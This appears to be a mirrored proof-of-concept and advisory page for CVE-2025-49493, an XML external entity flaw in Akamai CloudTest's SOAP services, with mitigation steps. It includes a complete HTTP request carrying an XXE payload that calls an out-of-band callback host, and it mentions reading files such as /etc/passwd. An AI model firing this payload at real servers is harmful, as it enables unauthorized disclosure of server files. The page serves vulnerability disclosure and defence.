关联漏洞
描述
CVE-2025-49493
介绍
# CVE-2025-49493 Akamai CloudTest - XXE Injection ☁️
## 📄 Description:
Akamai CloudTest before 60 2025.06.02 (12988) allows file inclusion via XML External Entity (XXE) injection.
---
## 🛠️ Basic Information:
* **Affected Product**: Akamai CloudTest (prior to version 60 — build 12988, released June 2025)
* **Vulnerability Type**: XML External Entity Injection (XXE)
* **CWE**: CWE‑611 – Improper Restriction of XML External Entity
* **Impact**: Remote attackers can send crafted XML to read local files on the server without authentication or user interaction.
---
## 🔍 Technical Details:
* Vulnerable SOAP endpoints include:
```
/concerto/services/RepositoryService
/concerto/services/CollectorService
/concerto/services/Concerto
/concerto/services/SampleService
```
```
POST //concerto/services/RepositoryService HTTP/1.1
Host: readacted.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138", "Brave";v="138"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (******; **** *** ** X 10_15_7) **********/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 *****/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 610
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "http://b6it5hei11vmt9as2lbg98h4gvmrahy6.oastify.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:rep="http://example.com/services/repository">
<soapenv:Header/>
<soapenv:Body>
<rep:getUIBundleObjectXml>
<rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
</rep:getUIBundleObjectXml>
</soapenv:Body>
</soapenv:Envelope>
```
* The flaw allows attackers to inject external DTDs (Document Type Definitions) and exploit XML parsers to leak local file content.
* Techniques such as error-based parsing and out-of-band (OOB) data exfiltration can be used.
---
## 📊 Severity:
* **CVSS v3.1 Score**: 5.8 (Medium 🟠)
* **Attack Vector**: Network
* **Privileges Required**: None
* **User Interaction**: None
* **Impact**: Confidentiality breach (e.g., reading `/etc/passwd`)
---
## ✅ Mitigation Steps:
1. **Update to CloudTest version 60 or later**, where external entity parsing is disabled by default.
2. **Disable DTD processing** in XML parsers manually if an upgrade isn't possible.
3. **Restrict network access** to CloudTest instances (e.g., via firewalls and IP allowlists).
4. **Monitor XML traffic** for anomalies or known exploit patterns.
5. **Limit file access permissions** for the CloudTest service to reduce impact.
6. **Deploy a WAF (Web Application Firewall)** with rules against XXE attacks.
---
## 📅 Timeline:
* Vulnerability discovered: June 2025
* Fix released: Early July 2025
* Proof of Concept (PoC) exists publicly.
* No confirmed mass exploitation as of now.
---
### ✅ Summary Table:
| Field | Details |
| ---------------- | ----------------------------------- |
| Product | Akamai CloudTest < v60 |
| CVSS Score | 5.8 (Medium) |
| Exploitable | Remotely, no auth required |
| Affected Feature | XML SOAP services |
| Attack Technique | XXE via external DTDs |
| Patch | Available in version 60 (June 2025) |
| Risk | Disclosure of sensitive files |
---
## ⚠️ Disclaimer:
This PoC is provided for educational and research purposes only. Running this on any system without permission is illegal and unethical !!!
文件快照
[4.0K] /data/pocs/309fbb9cfcd045024458d5e66ab19b6a15e2c867
└── [4.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。